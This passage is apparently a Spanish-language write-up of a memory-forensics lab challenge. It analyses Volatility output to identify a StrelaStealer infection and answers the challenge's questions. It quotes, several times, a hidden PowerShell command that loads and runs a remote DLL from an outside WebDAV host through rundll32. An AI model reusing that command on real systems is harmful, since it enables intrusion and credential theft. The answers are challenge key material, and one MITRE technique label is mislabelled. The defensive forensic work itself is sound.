**** 1200 5488 msedge.exe 0xc90c03540080 17 - 1 False 2024-07-15 04:02:53.000000 N/A \Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe - -
**** 4464 5488 msedge.exe 0xc90c0963b080 17 - 1 False 2024-07-15 04:17:28.000000 N/A \Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=145 --time-ticks-at-unix-epoch=-1720089883345586 --launch-time-ticks=1128944393 --field-trial-handle=10996,i,4550380774351628999,14075719362826743519,262144 --variations-seed-version --mojo-platform-channel-handle=9344 /prefetch:1 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
**** 1880 5488 msedge.exe 0xc90c0963a080 17 - 1 False 2024-07-15 04:19:01.000000 N/A \Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=153 --time-ticks-at-unix-epoch=-1720089883345586 --launch-time-ticks=1222488836 --field-trial-handle=10948,i,4550380774351628999,14075719362826743519,262144 --variations-seed-version --mojo-platform-channel-handle=7820 /prefetch:1 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
**** 5780 5488 msedge.exe 0xc90c092ec080 18 - 1 False 2024-07-04 10:45:14.000000 N/A \Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --field-trial-handle=1928,i,4550380774351628999,14075719362826743519,262144 --variations-seed-version --mojo-platform-channel-handle=2684 /prefetch:3 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
**** 7540 5488 msedge.exe 0xc90c095da080 18 - 1 False 2024-07-04 10:45:35.000000 N/A \Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe - -
**** 10136 5488 msedge.exe 0xc90c0c9b9080 10 - 1 False 2024-07-15 04:18:53.000000 N/A \Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe - -
*** 8720 3656 notepad.exe 0xc90c098d2080 1 - 1 False 2024-07-15 04:08:10.000000 N/A \Device\HarddiskVolume3\Windows\System32\notepad.exe "C:\Windows\system32\notepad.exe" C:\Windows\system32\notepad.exe
*** 5364 3656 thunderbird.ex 0xc90c09307080 50 - 1 False 2024-07-15 04:03:59.000000 N/A \Device\HarddiskVolume3\Program Files\Mozilla Thunderbird\thunderbird.exe "C:\Program Files\Mozilla Thunderbird\thunderbird.exe" C:\Program Files\Mozilla Thunderbird\thunderbird.exe
**** 8332 5364 thunderbird.ex 0xc90c0c86d080 16 - 1 False 2024-07-15 04:04:12.000000 N/A \Device\HarddiskVolume3\Program Files\Mozilla Thunderbird\thunderbird.exe - -
**** 4492 5364 thunderbird.ex 0xc90c095ad080 16 - 1 False 2024-07-15 04:04:00.000000 N/A \Device\HarddiskVolume3\Program Files\Mozilla Thunderbird\thunderbird.exe - -
**** 8600 5364 thunderbird.ex 0xc90c0c41b080 15 - 1 False 2024-07-15 04:04:03.000000 N/A \Device\HarddiskVolume3\Program Files\Mozilla Thunderbird\thunderbird.exe - -
**** 3004 5364 thunderbird.ex 0xc90c095ab080 4 - 1 False 2024-07-15 04:09:02.000000 N/A \Device\HarddiskVolume3\Program Files\Mozilla Thunderbird\thunderbird.exe - -
**** 3644 5364 thunderbird.ex 0xc90c0c750080 4 - 1 False 2024-07-15 04:09:02.000000 N/A \Device\HarddiskVolume3\Program Files\Mozilla Thunderbird\thunderbird.exe - -
*** 5848 3656 SecurityHealth 0xc90c09880080 3 - 1 False 2024-07-04 10:45:15.000000 N/A \Device\HarddiskVolume3\Windows\System32\SecurityHealthSystray.exe "C:\Windows\System32\SecurityHealthSystray.exe" C:\Windows\System32\SecurityHealthSystray.exe
* 956 588 dwm.exe 0xc90c07ca0080 16 - 1 False 2024-07-04 10:44:50.000000 N/A \Device\HarddiskVolume3\Windows\System32\dwm.exe "dwm.exe" C:\Windows\system32\dwm.exe
1728 6192 MicrosoftEdgeU 0xc90c09722080 4 - 0 True 2024-07-15 04:03:38.000000 N/A \Device\HarddiskVolume3\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe - -
9112 4120 wordpad.exe 0xc90c0991d080 8 - 1 False 2024-07-15 07:00:03.000000 N/A \Device\HarddiskVolume3\Program Files\Windows NT\Accessories\wordpad.exe "C:\Program Files\Windows NT\Accessories\wordpad.exe" C:\Program Files\Windows NT\Accessories\wordpad.exe
3692 4120 powershell.exe 0xc90c0358b080 17 - 1 False 2024-07-15 07:00:03.000000 N/A \Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden net use \\45.9.74.32@8888\davwwwroot\ ; rundll32 \\45.9.74.32@8888\davwwwroot\3435.dll,entry C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
* 2416 3692 net.exe 0xc90c08fd6080 5 - 1 False 2024-07-15 07:00:06.000000 N/A \Device\HarddiskVolume3\Windows\System32\net.exe "C:\Windows\system32\net.exe" use \\45.9.74.32@8888\davwwwroot\ C:\Windows\system32\net.exe
* 6892 3692 conhost.exe 0xc90c0a09b0c0 5 - 1 False 2024-07-15 07:00:03.000000 N/A \Device\HarddiskVolume3\Windows\System32\conhost.exe \??\C:\Windows\system32\conhost.exe 0x4 C:\Windows\system32\conhost.exe
El resultado muestra que el proceso powershell.exe
(PID: 3692) fue iniciado con los siguientes comandos:
powershell.exe -windowstyle hidden net use \\45.9.74.32@8888\davwwwroot\ ; rundll32 \\45.9.74.32@8888\davwwwroot\3435.dll,entry
ste comando es claramente malicioso, ya que intenta conectarse a un recurso compartido de red externo (\\45.9.74.32@8888\davwwwroot\
) y ejecutar un archivo DLL (3435.dll
) posiblemente malicioso utilizando rundll32.exe
.
Además, se observaron los siguientes procesos hijos de powershell.exe
:
net.exe
(PID: 2416): Se utiliza para establecer una conexión con el recurso compartido de red.conhost.exe
(PID: 6892): Proceso auxiliar que proporciona una ventana de consola para la interacción con la línea de comandos.
5. Conclusiones
El análisis revela que el proceso powershell.exe
(PID: 3692) es el proceso malicioso que ejecuta comandos sospechosos con el fin de comprometer el sistema y conectarse a un servidor remoto. La inyección de código en la memoria y la ejecución de una DLL a través de rundll32.exe
son indicativos de un ataque avanzado que intenta mantener el control remoto sobre el sistema.
#2 Respuesta: 4120
Knowing the parent process ID (PID) of the malicious process aids in tracing the process hierarchy and understanding the attack flow. What is the parent PID of the malicious process?
Obtención de la evidencia
El resultado del listado de proceso (windows.pstree) en la pregunta anterior mostró que el PID del proceso padre del proceso malicioso powershell.exe
(PID: 3692) es 4120.
Este PID corresponde al proceso que inició powershell.exe
y es esencial para entender cómo se originó la ejecución maliciosa en el sistema.
vol -f 192-Reveal.dmp windows.pstree
Output:
3692 4120 powershell.exe 0xc90c0358b080 17 - 1 False 2024-07-15 07:00:03.000000 N/A \Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden net use \\45.9.74.32@8888\davwwwroot\ ; rundll32 \\45.9.74.32@8888\davwwwroot\3435.dll,entry C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
#3 Respuesta: 3435.dll
Determining the file name used by the malware for executing the second-stage payload is crucial for identifying subsequent malicious activities. What is the file name that the malware uses to execute the second-stage payload?
Obtención de la evidencia
El análisis del árbol de procesos (pstree
) en la pregunta #1 reveló que el proceso powershell.exe
fue iniciado con el siguiente comando:
powershell.exe -windowstyle hidden net use \\45.9.74.32@8888\davwwwroot\ ; rundll32 \\45.9.74.32@8888\davwwwroot\3435.dll,entry
Archivo malicioso identificado:
El archivo que el malware utiliza para ejecutar la carga útil de segunda etapa es 3435.dll
.
#4 Respuesta: davwwwroot
Identifying the shared directory on the remote server helps trace the resources targeted by the attacker. What is the name of the shared directory being accessed on the remote server?
Obtención de la evidencia
El análisis del árbol de procesos (pstree
) en la pregunta #1 reveló que el proceso powershell.exe
fue iniciado con el siguiente comando:
powershell.exe -windowstyle hidden net use \\45.9.74.32@8888\davwwwroot\ ; rundll32 \\45.9.74.32@8888\davwwwroot\3435.dll,entry
Directorio compartido identificado:
El nombre del directorio compartido en el servidor remoto al que se intentó acceder es davwwwroot
.
Este directorio compartido en el servidor remoto \\45.9.74.32@8888\
es el objetivo del atacante para almacenar o ejecutar archivos maliciosos, como el DLL identificado (3435.dll
).
#4 Respuesta: T1218.011
What is the MITRE sub-technique ID used by the malware to execute the second-stage payload?
Obtención de la evidencia
Basándonos en la información adquirida, el malware ejecuta una carga útil de segunda etapa utilizando un archivo DLL (3435.dll
) a través del comando rundll32
, que comúnmente se asocia con la inyección o ejecución de DLLs. buscamos en la pagina oficial de MITRE ATT&CK por rundll32
https://attack.mitre.org/techniques/T1218/011/
Técnica y Subtécnica Relevante de MITRE ATT&CK:
- Técnica: Intérprete de Comandos y Secuencias de Comandos (T1059)
- Subtécnica: Rundll32 (T1218.011)
ID de Subtécnica: T1218.011
Esta subtécnica describe el uso de rundll32.exe
para ejecutar archivos DLL que pueden contener código malicioso, lo cual se alinea con el método utilizado por el malware en el análisis proporcionado.
#5 Respuesta: Elon
Identifying the username under which the malicious process runs helps in assessing the compromised account and its potential impact. What is the username that the malicious process runs under?
Obtención de la evidencia
Determinar el nombre de usuario bajo el cual se ejecuta un proceso malicioso es fundamental para evaluar la cuenta comprometida y su posible impacto. En este caso, se ha utilizado el comando windows.getsids
de Volatility para obtener el SID (Security Identifier) asociado con el proceso powershell.exe
(PID: 3692), que se identificó como malicioso.
vol -f 192-Reveal.dmp windows.getsids --pid 3692
Output:
Volatility 3 Framework 2.7.
Progress: 100.00 PDB scanning finished
PID Process SID Name
3692 powershell.exe S-1-5-21-3274565340-3808842250-3617890653-1001 Elon
3692 powershell.exe S-1-5-21-3274565340-3808842250-3617890653-513 Domain Users
3692 powershell.exe S-1-1-0 Everyone
3692 powershell.exe S-1-5-114 Local Account (Member of Administrators)
3692 powershell.exe S-1-5-32-544 Administrators
3692 powershell.exe S-1-5-32-545 Users
3692 powershell.exe S-1-5-4 Interactive
3692 powershell.exe S-1-2-1 Console Logon (Users who are logged onto the physical console)
3692 powershell.exe S-1-5-11 Authenticated Users
3692 powershell.exe S-1-5-15 This Organization
3692 powershell.exe S-1-5-113 Local Account
3692 powershell.exe S-1-5-5-0-277248 Logon Session
3692 powershell.exe S-1-2-0 Local (Users with the ability to log in locally)
3692 powershell.exe S-1-5-64-10 NTLM Authentication
3692 powershell.exe S-1-16-12288 High Mandatory Level
Nombre de Usuario Identificado:
El nombre de usuario bajo el cual se ejecuta el proceso malicioso es Elon
.
#6 Respuesta: STRELASTEALER
Knowing the name of the malware family is essential for correlating the attack with known threats and developing appropriate defenses. What is the name of the malware family?
Obtención de la evidencia
Para identificar la familia de malware asociada con el archivo DLL descargado durante el análisis de memoria, seguimos los pasos detallados a continuación:
powershell.exe -windowstyle hidden net use \\45.9.74.32@8888\davwwwroot\ ; rundll32 \\45.9.74.32@8888\davwwwroot\3435.dll,entry
- Dirección IP Remota:
45.9.74.32
- Archivo DLL:
3435.dll
Búsqueda en VirusTotal
Para determinar la familia de malware asociada con el archivo DLL, realizamos una búsqueda en VirusTotal utilizando la dirección IP 45.9.74.32
, que fue la fuente del archivo DLL malicioso.
La búsqueda en VirusTotal reveló información clave sobre el archivo descargado desde la IP mencionada, incluyendo que el archivo DLL 3435.dll
se asocia con la familia de malware STRELASTEALER.
:wq!